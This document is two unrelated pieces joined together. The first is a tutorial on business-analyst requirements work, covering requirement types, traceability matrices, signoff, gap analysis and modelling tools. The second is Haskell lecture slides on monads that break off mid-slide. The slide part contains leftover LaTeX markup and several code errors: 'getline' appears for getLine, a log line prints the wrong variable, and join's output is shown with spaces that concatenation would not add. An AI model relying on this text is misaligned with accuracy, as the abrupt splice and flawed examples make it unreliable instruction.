A Business Analyst gathers information by observing existing systems, studying existing procedures, and holding discussions with customers and end users. The analyst should also have imaginative and creative skills to draw on in the absence of a working system. Analyzing the gathered requirements to find the missing links is requirements analysis. **Eliciting Approach** To elicit the objectives, ask the business expert, the development manager, and the project sponsor the following questions: - What business objectives of the company will this project help achieve? - Why are we doing this project now? - What will happen if we do it later? - What if we do not do it at all? - Who will benefit from this project? - Do the people who will benefit from it consider it the most important improvement that can possibly be made at this time? - Should we be doing a different project instead? Possible objectives might be reducing costs, improving customer service, simplifying the workflow, replacing obsolete technology, piloting a new technology, and many others. Also, make sure you understand exactly how the proposed project will help accomplish the stated objective. **Different Types of Requirements** The most common types of requirements that a Business Analyst is interested in are the following: **Business Requirements** Business requirements are the critical activities of an enterprise that must be performed to meet the organizational objectives, while remaining solution independent. A business requirements document (BRD) details the business solution for a project, including the documentation of customer needs and expectations. **User Requirements** User requirements specify what the user expects/wants from the software to be constructed in the software project. A user requirement should be verifiable, clear and concise, complete, consistent, traceable, and viable. 
The user requirements document (URD), or user requirements specification, is a document usually used in software engineering that specifies what the user expects the software to be able to do. System Requirements System requirements define the software resource requirements and prerequisites that need to be installed on a computer to provide optimal functioning of an application. Functional Requirements Functional requirements capture and specify the intended behavior of the system being developed. They define things such as system calculations, data manipulation and processing, user interface and interaction with the application, and other specific functionality that shows how user requirements are satisfied. Assign a unique ID number to each requirement. Non-Functional Requirements A non-functional requirement specifies criteria that can be used to judge the operation of a system, rather than specific behaviors. The system architecture addresses the plan for implementing non-functional requirements. Non-functional requirements describe what the system should be like, and are often phrased as “the system shall be …”. They are often called the qualities of the system. Transition Requirements Transition requirements describe capabilities that the solution must fulfill in order to facilitate the transition from the current state of the enterprise to a desired future state, but that will not be needed once that transition is complete. They are differentiated from other requirement types because they are always temporary in nature, and because they cannot be developed until both the existing and the new solution are defined. They typically cover data conversion from existing systems, skill gaps that must be addressed, and other related changes needed to reach the desired future state. They are developed and defined through solution assessment and validation. 
Traceability & Change Management Requirements traceability is a way to organize, document and keep track of all your requirements, from initial idea generation through to the testing phase. The requirements traceability matrix (RTM) provides a method for tracking the functional requirements and their implementation through the development process. Each requirement is included in the matrix along with its associated section number. As the project progresses, the RTM is updated to reflect each requirement’s status. When the product is ready for system testing, the matrix lists each requirement, what product component addresses it, and what test verifies that it is correctly implemented. Sample screenshot of an automated traceability tool Include columns for each of the following in the RTM: - Requirement description - Requirement reference in the FRD - Verification method - Requirement reference in the Test Plan Example: connecting the dots to identify the relationships between items within your project, as a common downstream flow: Idea → Requirements → Design → Test You should be able to trace each of your requirements back to its original business objective. By tracing requirements, you are able to identify the ripple effect that changes have, see whether a requirement has been completed, and whether it is being tested properly. Traceability and change management provide managers peace of mind and the visibility needed to anticipate issues and ensure continuous quality. Quality Assurance Getting requirements delivered right the first time can mean better quality, faster development cycles and higher customer satisfaction with the product. Requirements management not only helps you get it right, but also helps your team save money and many headaches throughout the development process. Concise, specific requirements can help you detect and fix problems early, rather than later, when it is much more expensive to fix them. 
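The RTM columns listed above can be sketched as a small table in code. In this illustrative Python example (column names and IDs are assumptions for demonstration), each row links a requirement to its FRD reference, verification method and test-plan reference, so that untraced requirements can be reported:

```python
# Hypothetical sketch of an RTM: one dict per requirement, with the columns
# listed above. A simple query then finds requirements with no test reference.
rtm = [
    {"req": "FR-1", "description": "User can log in",
     "frd_ref": "FRD 3.1", "method": "Test", "test_ref": "TP-4"},
    {"req": "FR-2", "description": "Audit log of withdrawals",
     "frd_ref": "FRD 3.2", "method": "Inspection", "test_ref": None},
]

def untested(matrix):
    """Requirements that have no test-plan reference yet."""
    return [row["req"] for row in matrix if not row["test_ref"]]

print(untested(rtm))  # -> ['FR-2']
```

The same table supports the ripple-effect question: when "FRD 3.2" changes, filtering rows by `frd_ref` immediately shows which requirements and tests are affected.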
In addition, it can cost up to 100 times more to correct a defect later in the development process, after it has been coded, than to correct it early on, while it is still a requirement. By integrating requirements management into your quality assurance process, you can help your team increase efficiency and eliminate rework. Moreover, rework is where most of the cost issues occur. In other words, development teams waste the majority of their budgets on efforts that were not performed correctly the first time. For example, a developer codes a feature based on an old specification document, only to learn later that the requirements for that feature have changed. These types of issues can be avoided with effective requirements management best practices. In summary, requirements management can sound like a complex discipline, but when you boil it down to a simple concept, it is about helping teams answer the question, “Does everyone understand what we’re building and why?” From the business analysts, product managers and project leaders to the developers, QA managers and testers, along with the stakeholders and customers involved – very often the root cause of project failure is a misunderstanding of the scope of the project. When everyone is collaborating and has full context and visibility into the discussions, decisions and changes involved with the requirements throughout the lifecycle of the project, that is when success happens consistently and you maintain continuous quality. In addition, the process is smoother, with less friction and frustration along the way for everyone involved. Note: Research has shown that project teams can eliminate 50-80% of project defects by effectively managing requirements. 
According to the Carnegie Mellon Software Engineering Institute, “60-80 percent of the cost of software development is in rework.” Obtaining Requirements Signoff Requirements signoff formalizes agreement by project stakeholders that the content and presentation of the requirements, as documented, are accurate and complete. Formal agreement reduces the risk that, during or subsequent to implementation, a stakeholder will introduce a new (previously unencountered) requirement. Obtaining requirements signoff typically involves a face-to-face final review of the requirements, as documented, with each project stakeholder. At the end of each review, the stakeholder is asked to formally approve the reviewed requirements document. This approval may be recorded either physically or electronically. Obtaining requirements signoff is typically the final task within requirements communication. The Business Analyst will require the output from the formal requirements review(s), including accommodation of any comments or objections raised during the review process. A Business Model can be defined as a representation of a business or solution that often includes a graphic component along with supporting text and relationships to other components. For example, if we have to understand a company’s business model, we would study the following areas: - Core values of the company - Whom it serves - What sets it apart - Its key resources - Major relationships - Its delivery channels With the help of modelling techniques, we can create a complete description of existing and proposed organizational structures, processes, and information used by the enterprise. A Business Model is a structured model, just like a blueprint for the final product to be developed. It gives structure and dynamics for planning, and provides the foundation for the final product. 
**Purpose of Business Modelling** Business modelling is used to design the current and future state of an enterprise. This model is used by the Business Analyst and the stakeholders to ensure that they have an accurate understanding of the current “As-Is” model of the enterprise. It is also used to verify whether stakeholders have a shared understanding of the proposed “To-Be” state of the solution. Analyzing requirements is part of the business modelling process and forms its core focus area. Functional requirements are gathered during the “current state” analysis. These requirements are provided by the stakeholders regarding the business processes, data, and business rules that describe the desired functionality to be designed into the future state. Performing GAP Analysis After defining the business needs, the current state (e.g. current business processes, business functions, features of the current system, services/products offered, and events that the system must respond to) must be identified, to understand how people, processes, technology, structure and architecture are supporting the business, by seeking input from IT staff and other related stakeholders, including business owners. A gap analysis is then performed to assess whether there is any gap that prevents achieving the business needs, by comparing the identified current state with the desired outcomes. If there is no gap (i.e. the current state is adequate to meet the business needs and desired outcomes), it will probably not be necessary to launch the IT project. Otherwise, the problems/issues that must be addressed in order to bridge the gap should be identified. Techniques such as SWOT (Strengths, Weaknesses, Opportunities and Threats) analysis and document analysis can be used. To Assess the Proposed System The BA should assist the IT project team in assessing the proposed IT system, to ensure that it meets the business needs and maximizes the value delivered to stakeholders. 
The BA should also review the organization’s readiness for supporting the transition to the proposed IT system, to ensure a smooth system implementation. Step 1: Assess the Proposed System Step 2: Review Organizational Readiness for System Implementation The BA should help the IT project team determine whether the proposed system option and the high-level system design could meet the business needs and deliver enough business value to justify the investment. If there is more than one system option, the BA should work with the IT staff to identify the pros and cons of each option and select the option that delivers the greatest business value. Guiding Principles for Business Modelling The primary role of business modelling is mostly during the inception and elaboration stages of a project, and it fades during the construction and transition stages. It mostly concerns the analytical aspects of the business, combined with technical mapping of the application or software solution. - **Domain and user variation**: Developing a business model will frequently reveal areas of disagreement or confusion between stakeholders. The Business Analyst will need to document the following variations in the As-Is model. - **Multiple work units perform the same function**: Document the variances in the As-Is model. These may be different divisions or geographies. - **Multiple users perform the same work**: Different stakeholders may do similar work differently. The variation may be the result of different skill sets and approaches of different business units, or the result of differing needs of external stakeholders serviced by the enterprise. Document the variances in the As-Is model. - **Resolution mechanism**: The Business Analyst should document whether the To-Be solution will accommodate the inconsistencies in the current business model, or whether the solution will require standardization. Stakeholders need to determine which approach to follow. The To-Be model will reflect their decision. 
Example of the BA Role in Modelling ERP Systems A Business Analyst is expected to define a standard business process and set it up in an ERP system, which is of key importance for efficient implementation. It is also the duty of a BA to translate the language of the developers into understandable terms before the implementation, and then to utilize best practices and map them based on the system capabilities. A requirement on the system is the gap-fit analysis, which has to balance between: - The need for technical changes, which are the enhancements required to achieve identity with the existing practice. - Effective changes, which are related to re-engineering of existing business processes to allow for implementation of the standard functionality and application of process models. **Functional Business Analyst** Domain expertise is generally acquired over a period of time by being in the “business” of doing things. For example, - A **banking associate** gains knowledge of the various types of accounts that a customer (individual and business) can operate, along with the detailed business process flow. - An **insurance sales representative** can understand the various stages involved in procuring an insurance policy. - A **marketing analyst** has a better chance of understanding the key stakeholders and business processes involved in a Customer Relationship Management system. - A Business Analyst involved in a **capital markets** project is supposed to have subject matter expertise and strong knowledge of equities, fixed income and derivatives. He is also expected to have handled back office and front office operations, with practical exposure in applying risk management models. - A **Healthcare Business Analyst** is required to have a basic understanding of US healthcare financial and utilization metrics, technical experience and understanding of EDI 837/835/834, HIPAA guidelines, ICD-9/10 codification and CPT codes, and LOINC and SNOMED knowledge. 
Some Business Analysts acquire domain knowledge by testing business applications and working with the business users. They create a conducive learning environment through their interpersonal and analytical skills. In some cases, they supplement their domain knowledge with domain certifications offered by AICPCU/IIA and LOMA in the fields of insurance and financial services. Other institutes offer certifications in other domains.

**Other Major Activities**

Following a thorough examination of the current business processes, a BA can offer highly professional assistance in identifying the optimal approach to modelling the system:

- Organizing the preparation of a formalized and uniform description of business processes in a manner that ensures efficient automation in the system.
- Assisting teams in filling out the standard questionnaires for the relevant system, as furnished by the developers.
- Participating in the working meetings at which the requirements for the developers are defined.
- Checking and controlling whether the requirements that were set have been properly "reproduced" and recorded in the documents describing the future model in the system (blueprints).
- Preparing data and assisting with prototyping the system.
- Assisting in the preparation of data for migration of lists and balances in the format required by the system.
- Reviewing the set-up prototype for compliance with the requirements defined by the business process owners.
- Acting as a support resource to the IT teams in preparing data and actually performing functional and integration tests in the system.

In the next sections, we will briefly discuss some of the popular business modelling tools used by large organizations in IT environments.

**Tool 1: Microsoft Visio**

MS-Visio is a drawing and diagramming application that helps transform concepts into a visual representation. Visio provides you with pre-defined shapes, symbols, backgrounds, and borders.
Just drag and drop elements into your diagram to create a professional communication tool.

**Step 1:** To open a new Visio drawing, go to the Start Menu and select Programs → Visio.

**Step 2:** Move your cursor over "Business Process" and select "Basic Flowchart".

The following screenshot shows the major sections of the MS-Visio application. Let us now discuss the basic utility of each component:

**A:** The toolbars across the top of the screen are like those of other Microsoft programs such as Word and PowerPoint. If you have used these programs before, you may notice a few different functionalities, which we will explore later. Selecting Help → Diagram Gallery is a good way to become familiar with the types of drawings and diagrams that can be created in Visio.

**B:** The left side of the screen shows the menus specific to the type of diagram you are creating. In this case, we see:

- Arrow Shapes
- Backgrounds
- Basic Flowchart Shapes
- Borders and Titles

**C:** The center of the screen shows the diagram workspace, which includes the actual diagram page as well as some blank space adjacent to the page.

**D:** The right side of the screen shows some help functions. Some people may choose to close this window to increase the area of the diagram workspace, and re-open the help functions when necessary.

**Tool 2: Enterprise Architect**

Enterprise Architect is a visual modelling and design tool based on UML. The platform supports the design and construction of software systems, the modelling of business processes, and the modelling of industry-based domains. It is used by businesses and organizations not only to model the architecture of their systems, but also to manage the implementation of these models across the full application development life cycle.

**Sample screenshot from an Enterprise Architect solution**

The intent of Enterprise Architect is to determine how an organization can most effectively achieve its current and future objectives.
Enterprise Architect has four points of view, which are as follows:

- **Business perspective**: Defines the processes and standards by which the business operates on a day-to-day basis.
- **Application perspective**: Defines the interactions among the processes and standards used by the organization.
- **Information perspective**: Defines and classifies the raw data, such as document files, databases, images, presentations, and spreadsheets, that the organization requires in order to operate efficiently.
- **Technology perspective**: Defines the hardware, operating systems, programming, and networking solutions used by the organization.

**Tool 3: Rational RequisitePro**

Requirements management is the process of eliciting, documenting, organizing, tracking, and changing requirements, and communicating this information across the project teams, to ensure that iterative and unanticipated changes are maintained throughout the project life cycle. It also involves monitoring the status of, and controlling changes to, the requirement baseline; its primary elements are change control and traceability.

RequisitePro is used for the above activities as well as for project administration purposes; the tool supports querying and searching, and viewing the discussions that were made part of a requirement.

In RequisitePro, the user can work on the requirement document. The document is an MS-Word file created in the RequisitePro application and integrated with the project database. Requirements created outside RequisitePro can be imported or copied into the document.

In RequisitePro, we can also work with traceability: here, it is a dependency relationship between two requirements. Traceability is a methodical approach to managing change by linking requirements that are related to each other. RequisitePro makes it easy to track changes to a requirement throughout the development cycle, so it is not necessary to review all your documents individually to determine which elements need updating.
You can view and manage suspect relationships using a Traceability Matrix or a Traceability Tree view.

RequisitePro projects enable us to create a project framework in which the project artifacts are organized and managed. Each project includes the following:

- General project information
- Packages
- General document information
- Document types
- Requirement types
- Requirement attributes
- Attribute values
- Cross-project traceability

RequisitePro allows multiple users to access the same project documents and database simultaneously, so the project security aspect is very crucial. Security prevents system misuse, potential harm, and data loss arising from unauthorized user access to a project document. It is recommended that security be enabled for all RequisitePro projects. Doing so ensures that all changes to the project are associated with the proper username of the individual who made the change, thereby giving you a complete audit trail of all changes.
Monads

Stephen A. Edwards
Columbia University
Fall 2020

Motivating Example: lookup3
The Monad Type Class
The Maybe Monad
do Blocks
The Either Monad
Monad Laws
The List Monad
List Comprehensions as a Monad
The MonadPlus Type Class and guard
The Writer Monad
Some Monadic Functions: liftM, ap, join, filterM, foldM, mapM, sequence
Functions as Monads
The State Monad
An Interpreter for a Simple Imperative Language

Motivating Example: Chasing References in a Dictionary

In Data.Map,

```haskell
lookup :: Ord k => k -> Map k a -> Maybe a
```

Say we want a function that uses a key to look up a value, then treats that value as another key to look up a third key, which we look up and return, e.g.,

```haskell
lookup3 :: Ord k => k -> Map.Map k k -> Maybe k
```

Prelude> import qualified Data.Map.Strict as Map
Prelude Map> myMap = Map.fromList [("One","Two"),("Two","Three"),("Three","Winner")]
Prelude Map> Map.lookup "One" myMap
Just "Two"
Prelude Map> Map.lookup "Two" myMap
Just "Three"
Prelude Map> Map.lookup "Three" myMap
Just "Winner"

A First Attempt

```haskell
lookup3 :: Ord k => k -> Map.Map k k -> Maybe k   -- First try
lookup3 k1 m = case Map.lookup k1 m of
  Nothing -> Nothing
  Just k2 -> case Map.lookup k2 m of
    Nothing -> Nothing
    Just k3 -> Map.lookup k3 m
```

Too much repeated code, but it works.

*Main Map> lookup3 "Three" myMap
Nothing
*Main Map> lookup3 "Two" myMap
Nothing
*Main Map> lookup3 "One" myMap
Just "Winner"

What's the Repeated Pattern Here?

```haskell
Nothing -> Nothing
Just k2 -> case Map.lookup k2 m of ...
```

"Pattern match on a Maybe. Nothing returns Nothing; otherwise, strip the payload out of the Just and use it as an argument to a lookup."

```haskell
lookup3 :: Ord k => k -> Map.Map k k -> Maybe k   -- Second try
lookup3 k1 m = (helper . helper . helper) (Just k1)
  where helper Nothing  = Nothing
        helper (Just k) = Map.lookup k m
```

This looks like a job for a Functor or Applicative Functor...
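As an aside (not from the slides), the "second try" generalizes to chains of any length, which hints at why the per-step plumbing deserves its own operator. The following sketch introduces a hypothetical `lookupN` that chases `n` references; `demo` reuses the slides' example map:

```haskell
import qualified Data.Map.Strict as Map

-- Sketch only: generalize lookup3 to chase a chain of n references.
-- The per-step logic is exactly the "helper" from the second try.
lookupN :: Ord k => Int -> k -> Map.Map k k -> Maybe k
lookupN n k0 m = go n (Just k0)
  where
    go 0 acc      = acc
    go _ Nothing  = Nothing               -- one failed lookup poisons the rest
    go i (Just k) = go (i - 1) (Map.lookup k m)

demo :: Map.Map String String
demo = Map.fromList [("One","Two"),("Two","Three"),("Three","Winner")]

main :: IO ()
main = do
  print (lookupN 3 "One" demo)   -- Just "Winner", same as lookup3
  print (lookupN 2 "One" demo)   -- Just "Three"
  print (lookupN 3 "Two" demo)   -- Nothing: the chain runs off the end
```

The `go` loop repeats the same Nothing-propagation step the slides identify as the pattern worth abstracting.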
```haskell
class Functor f where
  fmap :: (a -> b) -> f a -> f b      -- Apply a function to data in a context

class Functor f => Applicative f where
  (<*>) :: f (a -> b) -> f a -> f b   -- Apply a function in a context
```

...but these don't fit, because our steps take a key and return a key in a context.

Even Better: An "ifJust" Function

```haskell
ifJust :: Maybe k -> (k -> Maybe k) -> Maybe k
ifJust Nothing  _ = Nothing   -- Failure: nothing more to do
ifJust (Just k) f = f k       -- Success: pass k to the function

lookup3 :: Ord k => k -> Map.Map k k -> Maybe k
lookup3 k1 m = ifJust (Map.lookup k1 m)
                 (\k2 -> ifJust (Map.lookup k2 m)
                   (\k3 -> Map.lookup k3 m))
```

It's cleaner to write `ifJust` as an infix operator:

```haskell
lookup3 :: Ord k => k -> Map.Map k k -> Maybe k
lookup3 k1 m = Map.lookup k1 m `ifJust` \k2 ->
               Map.lookup k2 m `ifJust` \k3 ->
               Map.lookup k3 m
```

The Monad Type Class: It's All About That Bind

```haskell
infixl 1 >>=
class Applicative m => Monad m where
  (>>=)  :: m a -> (a -> m b) -> m b   -- "Bind"
  return :: a -> m a                   -- Wrap a result in the Monad
```

Bind, >>=, is the operator missing from the Functor and Applicative Functor type classes. It allows chaining context-producing functions:

```haskell
pure  :: b -> f b                   -- Put a value in a context
fmap  :: (a -> b) -> f a -> f b     -- Apply a function in a context
(<*>) :: f (a -> b) -> f a -> f b   -- The function itself is in a context
(=<<) :: (a -> f b) -> f a -> f b   -- Apply a context-producing function
```

Actually, Monad is a little bigger:

```haskell
infixl 1 >> >>=
class Monad m where
  -- The bind operator: apply the result in a Monad to a Monad producer
  (>>=) :: m a -> (a -> m b) -> m b

  -- Encapsulate a value in the Monad
  return :: a -> m a

  -- Like >>= but discard the result; often m () -> m b -> m b
  (>>) :: m a -> m b -> m b
  x >> y = x >>= \_ -> y   -- The default, which usually suffices

  -- Internal: added by the compiler to handle failed pattern matches
  fail :: String -> m a
  fail msg = error msg
```

Maybe is a Monad

```haskell
class Monad m where
  return :: a -> m a
  (>>=)  :: m a -> (a -> m b) -> m b
  fail   :: String -> m a

instance Monad Maybe where     -- Standard Prelude definition
  return x       = Just x     -- Wrap in a Just
  Just x  >>= f  = f x        -- Our "ifJust" function
  Nothing >>= _  = Nothing    -- "Computation failed"
  fail _         = Nothing    -- Fail quietly
```

The Maybe Monad in Action

Prelude> :t return "what?"
return "what?" :: Monad m => m [Char]
Prelude> return "what?" :: Maybe String
Just "what?"
Prelude> Just 9 >>= \x -> return (x*10)
Just 90
Prelude> Just 9 >>= \x -> return (x*10) >>= \y -> return (y+5)
Just 95
Prelude> Just 9 >>= \x -> Nothing >>= \y -> return (x+5)
Nothing
Prelude> Just 9 >> return 8 >>= \y -> return (y*10)
Just 80
Prelude> Just 9 >>= \_ -> fail "darn" >>= \x -> return (x*10)
Nothing

lookup3 Using Monads

```haskell
instance Monad Maybe where
  return x       = Just x
  Just x  >>= f  = f x        -- Apply f to last (successful) result
  Nothing >>= _  = Nothing    -- Give up
```

```haskell
lookup3 :: Ord k => k -> Map.Map k k -> Maybe k
lookup3 k1 m = Map.lookup k1 m >>= (\k2 ->
                 Map.lookup k2 m >>= (\k3 ->
                   Map.lookup k3 m))
```

Or, equivalently,

```haskell
lookup3 :: Ord k => k -> Map.Map k k -> Maybe k
lookup3 k1 m = Map.lookup k1 m >>= \k2 ->
               Map.lookup k2 m >>= \k3 ->
               Map.lookup k3 m
```

Monads and the do Keyword: Not Just For I/O

Monads are so useful, Haskell provides do notation to code them succinctly:

```haskell
lookup3 :: Ord k => k -> Map.Map k k -> Maybe k
lookup3 k1 m = do k2 <- Map.lookup k1 m
                  k3 <- Map.lookup k2 m
                  Map.lookup k3 m
```

These are semantically identical: do inserts the >>='s and lambdas. Note that each lambda's argument moves to the left of the expression:

```haskell
k2 <- Map.lookup k1 m
```

becomes

```haskell
Map.lookup k1 m >>= \k2 ->
```

Like an Applicative Functor

Prelude> (+) <$> Just 5 <*> Just 3
Just 8
Prelude> do
Prelude|   x <- Just (5 :: Int)
Prelude|   y <- return 3
Prelude|   return (x + y)
Just 8
Prelude> :t it
it :: Maybe Int

The Monad's type may change; a Nothing halts the computation and forces Maybe:

Prelude> do
Prelude|   x <- return 5
Prelude|   y <- return "ha!"
Prelude|   Nothing
Prelude|   return x
Nothing

fail is called when a pattern match fails:

Prelude> do
Prelude|   (x:xs) <- Just "Hello"
Prelude|   return x
Just 'H'
Prelude> do
Prelude|   (x:xs) <- Just []
Prelude|   return x
Nothing

Like Maybe, Either is a Monad

```haskell
data Either a b = Left a | Right b   -- Data.Either

instance Monad (Either e) where
  return x        = Right x
  Right x  >>= f  = f x        -- Right: keep the computation going
  Left err >>= _  = Left err   -- Left: something went wrong
```

Prelude> do
Prelude|   x <- Right "Hello"
Prelude|   y <- return " World"
Prelude|   return $ x ++ y
Right "Hello World"
Prelude> do
Prelude|   Right "Hello"
Prelude|   x <- Left "failed"
Prelude|   y <- Right $ x ++ "darn"
Prelude|   return y
Left "failed"

Monad Laws

Left identity: applying a function with >>= to a wrapped argument just applies the function.

    return x >>= f  =  f x

Right identity: using >>= to unwrap and then return to rewrap does nothing.

    m >>= return  =  m

Associativity: applying g after applying f is like applying f composed with g.

    (m >>= f) >>= g  =  m >>= (\x -> f x >>= g)

The List Monad: "Nondeterministic Computation"

Intuition: lists represent all possible results.

```haskell
instance Monad [] where
  return x = [x]                 -- Exactly one result
  xs >>= f = concat (map f xs)   -- Collect all possible results from f
  fail _   = []                  -- Error: "no possible result"
```

Prelude> [10,20,30] >>= \x -> [x-3, x, x+3]
[7,10,13,17,20,23,27,30,33]

"If we start with 10, 20, or 30, then either subtract 3, do nothing, or add 3, we will get 7 or 10 or 13 or 17 or ..., or 33."

```
[10,20,30] >>= \x -> [x-3, x, x+3]
  = concat (map (\x -> [x-3, x, x+3]) [10,20,30])
  = concat [[7,10,13],[17,20,23],[27,30,33]]
  = [7,10,13,17,20,23,27,30,33]
```

The List Monad

Everything needs to produce a list, but the lists may be of different types:

Prelude> [1,2] >>= \x -> ['a','b'] >>= \c -> [(x,c)]
[(1,'a'),(1,'b'),(2,'a'),(2,'b')]

This works because -> is at a lower level of precedence than
>>=:

```
[1,2] >>= \x -> ['a','b'] >>= \c -> [(x,c)]
  = [1,2] >>= (\x -> (['a','b'] >>= (\c -> [(x,c)])))
  = [1,2] >>= (\x -> concat (map (\c -> [(x,c)]) ['a','b']))
  = [1,2] >>= (\x -> [(x,'a'),(x,'b')])
  = concat (map (\x -> [(x,'a'),(x,'b')]) [1,2])
  = concat [[(1,'a'),(1,'b')],[(2,'a'),(2,'b')]]
  = [(1,'a'),(1,'b'),(2,'a'),(2,'b')]
```

The List Monad, do Notation, and List Comprehensions

```haskell
[1,2] >>= \x -> ['a','b'] >>= \c -> return (x, c)
```

```haskell
do x <- [1,2]        -- Send 1 and 2 to the function that takes x and
   c <- ['a','b']    -- sends 'a' and 'b' to the function that takes c and
   return (x, c)     -- wraps the pair (x, c)
```

```haskell
[ (x, c) | x <- [1,2], c <- ['a','b'] ]
```

each produce

    [(1,'a'),(1,'b'),(2,'a'),(2,'b')]

The MonadPlus Type Class and guard

```haskell
class Monad m => MonadPlus m where   -- In Control.Monad
  mzero :: m a                 -- "Fail," like Monoid's mempty
  mplus :: m a -> m a -> m a   -- "Alternative," like Monoid's mappend

instance MonadPlus [] where
  mzero = []
  mplus = (++)

guard :: MonadPlus m => Bool -> m ()
guard True  = return ()   -- In whatever Monad you're using
guard False = mzero       -- "Empty" value in the Monad
```

Using Control.Monad.guard as a filter: guard uses mzero to terminate a MonadPlus computation (e.g., Maybe or []). It either succeeds and returns () or fails. We never care about (), so use >>:

```haskell
[1..50] >>= \x ->
  guard (x `rem` 7 == 0) >>   -- Discard any returned ()
  return x
```

```haskell
do x <- [1..50]
   guard (x `rem` 7 == 0)   -- No <- makes for an implicit >>
   return x
```

```haskell
[ x | x <- [1..50], x `rem` 7 == 0 ]
```

each produce

    [7,14,21,28,35,42,49]

The Control.Monad.Writer Monad

For computations that return a value and accumulate a result in a Monoid, e.g., logging or code generation. Just a wrapper around a (value, log) pair. In Control.Monad.Writer,

```haskell
newtype Writer w a = Writer { runWriter :: (a, w) }

instance Monoid w => Monad (Writer w) where
  return x = Writer (x, mempty)   -- Append nothing
  Writer (x, l) >>= f = let Writer (y, l') = f x
                        in Writer (y, l `mappend` l')   -- Append to log
```

a is the result value; w is the accumulating log Monoid (e.g., a list). runWriter extracts the (value, log) pair from a Writer computation.

The Writer Monad in Action

```haskell
import Control.Monad.Writer

logEx :: Int -> Writer [String] Int   -- Type of log, result
logEx a = do tell ["logEx " ++ show a]               -- Just log
             b <- return 42                          -- No log
             tell ["b = " ++ show a]
             c <- writer (a + b + 10, ["compute c"]) -- Value and log
             tell ["c = " ++ show c]
             return c
```

*Main> runWriter (logEx 100)
(152,["logEx 100","b = 100","compute c","c = 152"])

Verbose GCD with the Writer

*Main> mapM_ putStrLn $ snd $ runWriter $ logGCD 9 3
logGCD 9 3
a > b
logGCD 6 9
a < b
logGCD 6 3
a > b
logGCD 3 6
a < b
logGCD 3 3
finished

```haskell
import Control.Monad.Writer

logGCD :: Int -> Int -> Writer [String] Int
logGCD a b = do
  tell ["logGCD " ++ show a ++ " " ++ show b]
  if a == b     then do writer (a, ["finished"])
  else if a < b then do tell ["a < b"]
                        logGCD a (b - a)
  else               do tell ["a > b"]
logGCD (a - b) a ``` Control.Monad.{liftM, ap}: Monads as Functors \[ \text{fmap} \, f \quad \Rightarrow \quad (a \rightarrow b) \rightarrow f \ a \rightarrow f \ b \quad \text{-- a.k.a.} \quad <\$> \] \[ (\langle\ast\rangle) \, : \, \text{Applicative} \; f \; \Rightarrow \; f \; (a \rightarrow b) \rightarrow f \; a \rightarrow f \; b \quad \text{-- “apply”} \] In Monad-land, these have alternative names \[ \text{liftM} \, : \, \text{Monad} \; m \; \Rightarrow \; (a \rightarrow b) \rightarrow m \; a \rightarrow m \; b \] \[ \text{ap} \, : \, \text{Monad} \; m \; \Rightarrow \; m \; (a \rightarrow b) \rightarrow m \; a \rightarrow m \; b \] and can be implemented with \( \gg= \) (or, equivalently, do notation) \[ \text{liftM} \; f \; m \; = \; \text{do} \; x \leftarrow m \quad \text{-- Get the argument from inside } m \] \[ \quad \text{return} \; (f \; x) \quad \text{-- Apply the argument to the function} \] \[ \text{ap} \; mf \; m \; = \; \text{do} \; f \leftarrow mf \quad \text{-- Get the function from inside } mf \] \[ \quad x \leftarrow m \quad \text{-- Get the argument from inside } m \] \[ \quad \text{return} \; (f \; x) \quad \text{-- Apply the argument to the function} \] Operations in a \textit{do} block are ordered: \( \text{ap} \) evaluates its arguments left-to-right liftM and ap In Action ```haskell liftM :: Monad m => (a -> b) -> m a -> m b ap :: Monad m => m (a -> b) -> m a -> m b ``` ``` Prelude> import Control.Monad Prelude Control.Monad> liftM (map Data.Char.toUpper) getline "HELLO" ``` Evaluate (+10) 42, but keep a log: ```haskell Prelude> :set prompt "> " > :set prompt-cont "| " > import Control.Monad.Writer > :{ | runWriter $ | ap (writer ((+10), ["first"])) (writer (42, ["second"])) | :} (52,["first","second"]) ``` Lots of Lifting: Applying two- and three-argument functions In Control.Applicative, applying a normal function to Applicative arguments: \[ \text{liftA2 :: Applicative } \Rightarrow (a \rightarrow b \rightarrow c) \rightarrow f \ a 
\rightarrow f \ b \rightarrow f \ c \] \[ \text{liftA3 :: Applicative } \Rightarrow (a \rightarrow b \rightarrow c \rightarrow d) \rightarrow f \ a \rightarrow f \ b \rightarrow f \ c \rightarrow f \ d \] In Control.Monad, \[ \text{liftM2 :: Monad } \Rightarrow (a \rightarrow b \rightarrow c) \rightarrow m \ a \rightarrow m \ b \rightarrow m \ c \] \[ \text{liftM3 :: Monad } \Rightarrow (a \rightarrow b \rightarrow c \rightarrow d) \rightarrow m \ a \rightarrow m \ b \rightarrow m \ c \rightarrow m \ d \] Example: lift the pairing operator \((,\)\) to the Maybe Monad: Prelude Control.Monad> \text{liftM2 (,) (Just 'a') (Just 'b')} Just ('a','b') Prelude Control.Monad> \text{liftM2 (,) Nothing (Just 'b')} Nothing join: Unwrapping a Wrapped Monad/Combining Objects \[ \text{join} :: \text{Monad} \ m \Rightarrow m (m \ a) \rightarrow m \ a \quad \text{--- in Control.Monad} \] \[ \text{join } mm = \text{do } m <- mm \quad \text{--- Remove the outer Monad; get the inner one} \quad m \quad \text{--- Pass it back verbatim (i.e., without wrapping it)} \] \textit{join} is boring on a Monad like Maybe, where it merely strips off a “Just” \begin{verbatim} Prelude Control.Monad> join (Just (Just 3)) Just 3 \end{verbatim} For Monads that hold multiple objects, \textit{join} lives up to its name and performs some sort of concatenation \begin{verbatim} > join ["Hello", "Monadic", "World!"] "Hello Monadic World!" 
